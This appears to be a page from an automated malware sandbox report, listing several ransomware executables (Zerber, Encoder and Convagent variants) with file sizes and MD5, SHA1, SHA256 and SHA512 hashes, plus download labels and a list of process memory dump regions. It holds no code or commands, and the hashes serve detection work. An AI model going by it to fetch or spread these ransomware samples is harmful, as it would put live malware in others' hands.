C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Zerber.bruy-b2f2ac6419392e3202cf057ef928104f795afb3e96747d85a62937cc6c7d8c9b.exe

Filesize
353KB

MD5
6e352cd0e6130ec8e16c0a212f0ddfa2

SHA1
fb4a19beb12dac8cc3ec5bf0544c2d7260dd8eac

SHA256
b2f2ac6419392e3202cf057ef928104f795afb3e96747d85a62937cc6c7d8c9b

SHA512
3b9776eb4de648bb550af2252d16d5708d01dbf89de518f9fcab00f5fb44a4cc7ab8fcf529a990f8c4c4dd79d664647d5eb72768c5c5eb2b5e3ceec9c279a164

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Zerber.eftm-c9ca22f2be98a84587dc0fabf28580095d7b8969b97c2c33fd75145a61e4a497.exe

Filesize
311KB

MD5
e58fe702b92dea9367c0a82cdbe9c861

SHA1
856e74febf88aa0a3db481bfd3a4eab0245cdd3a

SHA256
c9ca22f2be98a84587dc0fabf28580095d7b8969b97c2c33fd75145a61e4a497

SHA512
310697032314ca4c75333d65a7d4ab8360bbc831daa4b1dcefc4dcd939db04cc0a7a2bf721e1eb4d6e58c1c4b0ae6fa04e9349b0d56e23f13dcf71aa4f91121a

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Zerber.gcql-33f51bc65501f737c3411ddc0645a26b0777c912bf6b66a62e8cf7b433d04e9b.exe

Filesize
625KB

MD5
828dcdae96bf3729e803d09bdcb637d5

SHA1
2ecb0685626d6e7bd322f4d59ce9f1d34902fdc9

SHA256
33f51bc65501f737c3411ddc0645a26b0777c912bf6b66a62e8cf7b433d04e9b

SHA512
ec5db19410b5cf3c2b98e840384bfe6c4b23bcf35ed57fc4ee9e89c5a2df5af6c12be63532f60b1777f1860dffb8df662f9c285506963f80e2c3b4466cbbd51f

Download Submit
C:\Users\Admin\Desktop\00398\UDS-Trojan-Ransom.Win32.Encoder-c787c02fb6d846ba19b9b0d2413d613b463ea98b8baedefe97e9871ae9b99232.exe

Filesize
213KB

MD5
949ddda1f19a0ffc6826eac0b902c78a

SHA1
71aca7803c5c45f605206a0ddae2fabf508347a1

SHA256
c787c02fb6d846ba19b9b0d2413d613b463ea98b8baedefe97e9871ae9b99232

SHA512
8b703332e6f55fc729435a138426aeebacf87bd3b7618f8d4739b0f6e2e27f49aadbb8e0ded58114a64b531243cb3ec0055f489a4a746be0c0886f6c662a0645

Download Submit
C:\Users\Admin\Desktop\00398\VHO-Trojan-Ransom.Win32.Convagent.gen-c12e3a1fb7e095bac2a4d0eba367b222396fa7c6a7f616a1040b1c22729a7d2a.exe

Filesize
333KB

MD5
acad6c504243265dac312f48b93cea67

SHA1
3a0ff83b8f71f6c8df168a1adc11499ee5c87f96

SHA256
c12e3a1fb7e095bac2a4d0eba367b222396fa7c6a7f616a1040b1c22729a7d2a

SHA512
a311b36a9fa12c790e84ff029bf0383ed66be638633a4d9e91b9611d024b3319462d4222e466144c91db4f1a2a88c1705a0219960ec8cbe538c740c666714e50

Download Submit
C:\Users\Admin\Desktop\00398\VHO-Trojan-Ransom.Win32.Encoder.gen-c2b12d32b881483fa92e01f327950ddfd95bb6633e3f722076e4eb2e5f12e164.exe

Filesize
2.7MB

MD5
2347a1b6ec11fafb5f4f885e1daa5f92

SHA1
0d4804df142c06187954ee0c8ebfbfe873d1958c

SHA256
c2b12d32b881483fa92e01f327950ddfd95bb6633e3f722076e4eb2e5f12e164

SHA512
9002abf4f9f0c29ff8dcf55c802608e3447ba1486210e7e2c0169e986eee3ca6fd22ff15038327811609d72aad0f33f7f39de8ca01dc86f77bdc7779eada271d

Download Submit
C:\Users\Admin\Desktop\00398\VHO-Trojan-Ransom.Win32.Encoder.gen-c7de7b5d38f057c98ecf3d3836d9620e6dacac6f42a4ad28a3c9bb24e8942e96.exe

Filesize
5.9MB

MD5
d61cfbee2b4293566aa7f4c1d2b5b18a

SHA1
cd7be3b0a85dac82841551596fdebea7f9fa192e

SHA256
c7de7b5d38f057c98ecf3d3836d9620e6dacac6f42a4ad28a3c9bb24e8942e96

SHA512
e465e8862c227c310012a425f673690b984339fb007806049e79f82bdf5c13e4c3526cc4e2998a9959b0e59abc8a7012a6280edb672a90b33eb4fe230047a2f0

Download Submit
memory/1468-90-0x000001E16C400000-0x000001E16C422000-memory.dmp

Filesize
136KB

Download
memory/1468-98-0x000001E16C970000-0x000001E16C98E000-memory.dmp

Filesize
120KB

Download
memory/1468-96-0x000001E16C9B0000-0x000001E16CA26000-memory.dmp

Filesize
472KB

Download
memory/1468-95-0x000001E16C8E0000-0x000001E16C924000-memory.dmp

Filesize
272KB

Download
memory/1552-64-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-62-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-58-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-56-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-57-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-63-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-68-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-67-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-66-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/1552-65-0x00000270EA360000-0x00000270EA361000-memory.dmp

Filesize
4KB

Download
memory/2912-130-0x000000001BF30000-0x000000001BF7C000-memory.dmp

Filesize
304KB

Download
memory/2912-129-0x0000000000B50000-0x0000000000B58000-memory.dmp

Filesize
32KB

Download
memory/2912-115-0x0000000000C30000-0x0000000000CD6000-memory.dmp

Filesize
664KB

Download
memory/2912-120-0x000000001B8A0000-0x000000001BD6E000-memory.dmp

Filesize
4.8MB

Download
memory/2912-124-0x000000001BE10000-0x000000001BEAC000-memory.dmp

Filesize
624KB

Download
memory/3580-134-0x0000000005650000-0x000000000565A000-memory.dmp

Filesize
40KB

Download
memory/3580-127-0x0000000005B70000-0x0000000006114000-memory.dmp

Filesize
5.6MB

Download
memory/3580-128-0x0000000005660000-0x00000000056F2000-memory.dmp

Filesize
584KB

Download
memory/3580-116-0x0000000000700000-0x0000000000C4E000-memory.dmp

Filesize
5.3MB

Download
memory/4308-131-0x00007FFD75CA0000-0x00007FFD75E23000-memory.dmp

Filesize
1.5MB

Download
memory/4308-149-0x00007FFD70660000-0x00007FFD70A72000-memory.dmp

Filesize
4.1MB

Download
memory/4308-125-0x00007FFD70660000-0x00007FFD70A72000-memory.dmp

Filesize
4.1MB

Download
memory/4884-114-0x0000000000950000-0x000000000096A000-memory.dmp

Filesize
104KB

Download
memory/7216-193-0x0000000004FD0000-0x00000000055F8000-memory.dmp

Filesize
6.2MB

Download
memory/7216-192-0x0000000004960000-0x0000000004996000-memory.dmp

Filesize
216KB

Download
memory/7216-238-0x0000000005910000-0x0000000005976000-memory.dmp

Filesize
408KB

Download
memory/7216-237-0x0000000005870000-0x0000000005892000-memory.dmp

Filesize
136KB

Download
memory/7216-240-0x0000000005A00000-0x0000000005D54000-memory.dmp

Filesize
3.3MB

Download
memory/7216-239-0x0000000005980000-0x00000000059E6000-memory.dmp

Filesize
408KB

Download
memory/13476-223-0x0000000000400000-0x000000000076E000-memory.dmp

Filesize
3.4MB

Download
memory/19416-246-0x0000000000400000-0x0000000000514000-memory.dmp

Filesize
1.1MB

Download